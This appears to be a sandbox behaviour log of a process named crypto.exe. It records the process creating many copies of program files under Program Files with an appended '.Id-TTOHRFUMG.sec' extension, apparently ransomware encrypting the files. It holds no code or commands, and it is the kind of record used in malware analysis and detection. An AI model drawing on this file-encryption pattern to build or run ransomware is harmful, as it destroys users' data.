File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MpRTP.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\wmpnscfg.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115866.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guyana.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0305257.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18200_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198712.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_hover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\va.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw32.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\10.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\hi.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\OFFICE10.MMW.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ReviewRouting_Review.xsn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montevideo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\back_lrg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR11F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Category.accft.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00414_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\JAWTAccessBridge-64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_sw.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01839_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALENDAR.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\MediaReceiverRegistrar.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02435_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR1F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SlateBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libdolby_surround_decoder_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\de.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_OliveGreen.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceAmharic.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-dock.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceer35EN.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB1A.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0292020.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN110.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\DvdTransform.fx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00286_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR35F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB3B.BDR.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Generic.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WCOMP98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\pt-br.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\INTLDATE.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02270_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Doc.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02092_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\FONTSCHM.INI.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\VVIEWRES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232395.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Riga.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01842_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00705_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0187423.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Library\SOLVER\SOLVER32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0228823.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libtospdif_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceSimplifiedShuangPin.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00116_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103402.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGDOTS.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Baku.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Teal.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\security\trusted.libraries.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299125.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libdrawable_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jdwp.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00932_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01657_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099172.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL048.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\en-US\Sidebar.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107494.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02384_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00382_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\PreviousMenuButtonIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBARBLL.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00273_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR24F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\CST6CDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0196400.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\StatusDoNotDisturb.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\EquityReport.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_babypink_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Santo_Domingo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0217698.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15275_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome.exe.sig.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105306.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107182.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR50F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_ps_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\mr.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MSASCui.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00086_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBCOLOR.SCM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_left_over.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\uk.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15156_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\ssvagent.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART1.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLMIME.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Media Renderer\DMR_120.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\chrome.7z.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\GKWord.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00122_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR2F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libspdif_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libsubsdec_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\VBAOWS10.CHM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02361_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00941_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18212_.WMF.Id-TTOHRFUMG.sec	crypto.exe
